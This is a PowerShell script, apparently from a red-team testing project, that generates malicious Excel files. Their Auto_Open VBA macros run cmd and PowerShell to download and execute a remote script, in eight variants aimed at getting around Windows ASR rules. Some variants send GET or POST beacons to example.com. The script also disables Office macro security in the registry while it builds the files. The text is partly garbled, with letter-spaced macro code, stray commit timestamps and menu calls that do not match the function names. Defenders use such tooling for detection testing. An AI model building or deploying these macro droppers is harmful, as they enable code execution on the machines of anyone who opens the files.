2019-08-28 12:38:26 -06:00
#Adopted and Originally Coded by Matt Nelson (@enigma0x3)
#Reference: https://github.com/enigma0x3/Generate-Macro/blob/master/Generate-Macro.ps1
<#
. SYNOPSIS
Standalone Powershell script that will generate a malicious Microsoft Office document with a specified payload and persistence method
. DESCRIPTION
This script will generate malicious Microsoft Excel Documents that contain VBA macros .
The script will display a menu of different attacks, all with different ASR Bypass methods . Once an attack is chosen .
When naming the document, don't include a file extension .
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
. Attack Types
All 7 instances represent different ASR Bypasses based on research performed by great folks within the industry . All macros were absorbed from https://gist . github . com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3 .
Additional references:
- https://www . darkoperator . com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
- https://www . darkoperator . com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
- https://www . darkoperator . com/blog/2017/11/8/windows-defender-exploit-guard-asr-obfuscated-script-rule
- https://posts . specterops . io/the-emet-attack-surface-reduction-replacement-in-windows-10-rs3-the-good-the-bad-and-the-ugly-34d5a253f3df
- https://oddvar . moe/2018/03/15/windows-defender-attack-surface-reduction-rules-bypass/
. EXAMPLE
PS> . /Generate-Macro . ps1
Enter the name of the document (Do not include a file extension): FinancialData
--------Select Attack---------
1 . Chain Reaction Download and execute with Excel .
2 . Chain Reaction Download and execute with Excel, wmiprvse
3 . Chain Reaction Download and execute with Excel, wmiprvse benign
4 . Chain Reaction Download and execute with Excel Shell
5 . Chain Reaction Download and execute with Excel ShellBrowserWindow
6 . Chain Reaction Download and execute with Excel WshShell
7 . Chain Reaction Download and execute with Excel and POST C2 .
8 . Chain Reaction Download and execute with Excel and GET C2 .
------------------------------
Saved to file C:\Users\Malware\Desktop\FinancialData . xls
PS>
#>
$global:defLoc = " $env:userprofile \Desktop "
$global:Name = Read-Host " Enter the name of the document (Do not include a file extension) "
$global:Name = $global:Name + " .xls "
$global:FullName = " $global:defLoc \ $global:Name "
function Excel-Shell {
<#
. SYNOPSIS
Standard macro execution .
. DESCRIPTION
Upon execution, Excel will spawn cmd . exe to download and execute a chain reaction via powershell .
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
C a l l S h e l l ( " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 ' ) " , 1 )
E n d S u b
"@
#Create excel document
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Wmiprvse-Benign-Trampoline {
<#
. SYNOPSIS
Uses COM to download and execute a chain reaction via wmiprvse . This version will not execute mimikatz .
. DESCRIPTION
Using COM, upon macro execution, wmiprvse will spawn cmd . exe to run powershell to download and execute a benign chain reaction .
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
C o n s t H I D D E N _ W I N D O W = 0
s t r C o m p u t e r = " . "
S e t o b j W M I S e r v i c e = G e t O b j e c t ( " w i n " & " m g m t s " & " : \ \ " & s t r C o m p u t e r & " \ r o o t " & " \ c i m v 2 " )
S e t o b j S t a r t u p = o b j W M I S e r v i c e . G e t ( " W i n 3 2 _ " & " P r o c e s s " & " S t a r t u p " )
S e t o b j C o n f i g = o b j S t a r t u p . S p a w n I n s t a n c e _
o b j C o n f i g . S h o w W i n d o w = H I D D E N _ W I N D O W
S e t o b j P r o c e s s = G e t O b j e c t ( " w i n m g m t s : \ \ " & s t r C o m p u t e r & " \ r o o t " & " \ c i m v 2 " & " : W i n 3 2 _ " & " P r o c e s s " )
2020-10-05 09:31:36 -07:00
o b j P r o c e s s . C r e a t e " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / d r a g o n s t a i l _ b e n i g n . p s 1 ' ) " , N u l l , o b j C o n f i g , i n t P r o c e s s I D
2019-08-28 12:38:26 -06:00
E n d S u b
"@
#Create excel document
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Wmiprvse-Trampoline {
<#
. SYNOPSIS
Uses COM to download and execute chain reaction via wmiprvse .
. DESCRIPTION
Using COM, upon macro execution, wmiprvse will spawn cmd . exe to run powershell to download and execute a benign chain reaction .
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
C o n s t H I D D E N _ W I N D O W = 0
s t r C o m p u t e r = " . "
S e t o b j W M I S e r v i c e = G e t O b j e c t ( " w i n " & " m g m t s " & " : \ \ " & s t r C o m p u t e r & " \ r o o t " & " \ c i m v 2 " )
S e t o b j S t a r t u p = o b j W M I S e r v i c e . G e t ( " W i n 3 2 _ " & " P r o c e s s " & " S t a r t u p " )
S e t o b j C o n f i g = o b j S t a r t u p . S p a w n I n s t a n c e _
o b j C o n f i g . S h o w W i n d o w = H I D D E N _ W I N D O W
S e t o b j P r o c e s s = G e t O b j e c t ( " w i n m g m t s : \ \ " & s t r C o m p u t e r & " \ r o o t " & " \ c i m v 2 " & " : W i n 3 2 _ " & " P r o c e s s " )
o b j P r o c e s s . C r e a t e " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 ' ) " , N u l l , o b j C o n f i g , i n t P r o c e s s I D
E n d S u b
"@
#Create excel document
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Trampoline {
<#
. SYNOPSIS
Excel COM Trampoline .
. DESCRIPTION
Using COM, upon macro execution, wmiprvse will spawn cmd . exe to run powershell to download and execute a chain reaction .
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
C o n s t S h e l l W i n d o w s = _
" { 9 B A 0 5 9 7 2 - F 6 A 8 - 1 1 C F - A 4 4 2 - 0 0 A 0 C 9 0 A 8 F 3 9 } "
S e t S W = G e t O b j e c t ( " n e w : " & S h e l l W i n d o w s ) . I t e m ( )
S W . D o c u m e n t . A p p l i c a t i o n . S h e l l E x e c u t e " c m d . e x e " , " / c p o w e r s h e l l . e x e I W R - u r i " " h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 " " - O u t F i l e " " ~ \ D o c u m e n t s \ p a y l o a d . b a t " " ; ~ \ D o c u m e n t s \ p a y l o a d . b a t " , " C : \ W i n d o w s \ S y s t e m 3 2 " , N u l l , 0
E n d S u b
"@
#Create excel document
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-ShellBrowserWindow {
<#
. SYNOPSIS
Excel COM Trampoline .
. DESCRIPTION
Using COM, upon macro execution, svchost/explorer will spawn cmd . exe to run powershell to download and execute a chain reaction .
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
C o n s t S h e l l B r o w s e r W i n d o w = _
" { C 0 8 A F D 9 0 - F 2 A 1 - 1 1 D 1 - 8 4 5 5 - 0 0 A 0 C 9 1 F 3 8 8 0 } "
S e t S B W = G e t O b j e c t ( " n e w : " & S h e l l B r o w s e r W i n d o w )
S B W . D o c u m e n t . A p p l i c a t i o n . S h e l l E x e c u t e " c m d . e x e " , " / c p o w e r s h e l l . e x e I W R - u r i " " h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 " " - O u t F i l e " " ~ \ D o c u m e n t s \ p a y l o a d . b a t " " ; ~ \ D o c u m e n t s \ p a y l o a d . b a t " , " C : \ W i n d o w s \ S y s t e m 3 2 " , N u l l , 0
E n d S u b
"@
#Create excel document
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-wshshell {
<#
. SYNOPSIS
Excel COM WshShell .
. DESCRIPTION
Using COM, upon macro execution, svchost/explorer will spawn cmd . exe to run powershell to download and execute a chain reaction .
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
S e t W s h S h e l l = C r e a t e O b j e c t ( " W S c r i p t . S h e l l " )
S e t W s h S h e l l E x e c = W s h S h e l l . E x e c ( " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 ' ) " )
E n d S u b
"@
#Create excel document
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Shell-C2-GET {
<#
. SYNOPSIS
Standard macro execution .
. DESCRIPTION
Upon execution, Excel will spawn cmd . exe to download and execute a chain reaction via powershell .
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
E x e c u t e
C 2
E n d S u b
P u b l i c F u n c t i o n E x e c u t e ( ) A s V a r i a n t
C a l l S h e l l ( " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 ' ) " , 1 )
E n d F u n c t i o n
P u b l i c F u n c t i o n C 2 ( ) A s V a r i a n t
S e t o b j H T T P = C r e a t e O b j e c t ( " W i n H t t p . W i n H t t p R e q u e s t . 5 . 1 " )
U R L = " h t t p : / / w w w . e x a m p l e . c o m "
o b j H T T P . O p e n " G E T " , U R L , F a l s e
o b j H T T P . s e t R e q u e s t H e a d e r " U s e r - A g e n t " , " M o z i l l a / 4 . 0 ( c o m p a t i b l e ; M S I E 6 . 0 ; W i n d o w s N T 5 . 0 ) "
o b j H T T P . s e t R e q u e s t H e a d e r " C o n t e n t - t y p e " , " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d "
o b j H T T P . s e n d ( " A R T = A t o m i c R e d T e a m " )
E n d F u n c t i o n
"@
#Create excel document
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Shell-C2-POST {
<#
. SYNOPSIS
Standard macro execution .
. DESCRIPTION
Upon execution, Excel will spawn cmd . exe to download and execute a chain reaction via powershell .
#>
#create macro
$Code = @"
S u b A u t o _ O p e n ( )
E x e c u t e
C 2
E n d S u b
P u b l i c F u n c t i o n E x e c u t e ( ) A s V a r i a n t
C a l l S h e l l ( " c m d . e x e / c p o w e r s h e l l . e x e I E X ( I W R - u r i ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / r e d c a n a r y c o / a t o m i c - r e d - t e a m / m a s t e r / A R T i f a c t s / C h a i n _ R e a c t i o n s / c h a i n _ r e a c t i o n _ D r a g o n s T a i l . p s 1 ' ) " , 1 )
E n d F u n c t i o n
P u b l i c F u n c t i o n C 2 ( ) A s V a r i a n t
S e t o b j H T T P = C r e a t e O b j e c t ( " W i n H t t p . W i n H t t p R e q u e s t . 5 . 1 " )
U R L = " h t t p : / / w w w . e x a m p l e . c o m "
o b j H T T P . O p e n " P O S T " , U R L , F a l s e
o b j H T T P . s e t R e q u e s t H e a d e r " U s e r - A g e n t " , " M o z i l l a ( c o m p a t i b l e ; M S I E 6 . 0 ; W i n d o w s N T 5 . 0 ) "
o b j H T T P . s e t R e q u e s t H e a d e r " C o n t e n t - t y p e " , " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d "
o b j H T T P . s e n d ( " A R T = A t o m i c R e d T e a m " )
E n d F u n c t i o n
"@
#Create excel document
$Excel01 = New-Object -ComObject " Excel.Application "
$ExcelVersion = $Excel01 . Version
#Disable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01 . DisplayAlerts = $false
$Excel01 . DisplayAlerts = " wdAlertsNone "
$Excel01 . Visible = $false
$Workbook01 = $Excel01 . Workbooks . Add ( 1 )
$Worksheet01 = $Workbook01 . WorkSheets . Item ( 1 )
$ExcelModule = $Workbook01 . VBProject . VBComponents . Add ( 1 )
$ExcelModule . CodeModule . AddFromString ( $Code )
#Save the document
Add-Type -AssemblyName Microsoft . Office . Interop . Excel
$Workbook01 . SaveAs ( " $global:FullName " , [ Microsoft.Office.Interop.Excel.XlFileFormat ] :: xlExcel8 )
Write-Output " Saved to file $global:Fullname "
#Cleanup
$Excel01 . Workbooks . Close ( )
$Excel01 . Quit ( )
[ System.Runtime.Interopservices.Marshal ] :: ReleaseComObject ( $Excel01 ) | out-null
$Excel01 = $Null
if ( ps excel ) { kill -name excel }
#Enable Macro Security
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path " HKCU:\Software\Microsoft\Office\ $ExcelVersion \Excel\Security " -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
#Determine Attack
Do {
Write-Host "
--------Select Attack---------
1. Chain Reaction Download and execute with Excel.
2. Chain Reaction Download and execute with Excel, wmiprvse
3. Chain Reaction Download and execute with Excel, wmiprvse benign
4. Chain Reaction Download and execute with Excel Shell
5. Chain Reaction Download and execute with Excel ShellBrowserWindow
6. Chain Reaction Download and execute with Excel WshShell
7. Chain Reaction Download and execute with Excel and POST C2.
8. Chain Reaction Download and execute with Excel and GET C2.
------------------------------ "
$AttackNum = Read-Host -prompt " Select Attack Number & Press Enter "
} until ( $AttackNum -eq " 1 " -or $AttackNum -eq " 2 " -or $AttackNum -eq " 3 " -or $AttackNum -eq " 4 " -or $AttackNum -eq " 5 " -or $AttackNum -eq " 6 " -or $AttackNum -eq " 7 " -or $AttackNum -eq " 8 " )
#Initiate Attack Choice
if ( $AttackNum -eq " 1 " ) {
Excel-Com -Trampoline
}
elseif ( $AttackNum -eq " 2 " ) {
Excel-Com -Wmiprvse -Trampoline
}
elseif ( $AttackNum -eq " 3 " ) {
Excel-Com -Wmiprvse -Benign -Trampoline
}
elseif ( $AttackNum -eq " 4 " ) {
Excel-Shell
}
elseif ( $AttackNum -eq " 5 " ) {
Excel-Com -ShellBrowserWindow
}
elseif ( $AttackNum -eq " 6 " ) {
Excel-Com -wshshell
}
elseif ( $AttackNum -eq " 7 " ) {
Excel-Shell -C2 -POST
}
elseif ( $AttackNum -eq " 8 " ) {
Excel-Shell -C2 -GET
}
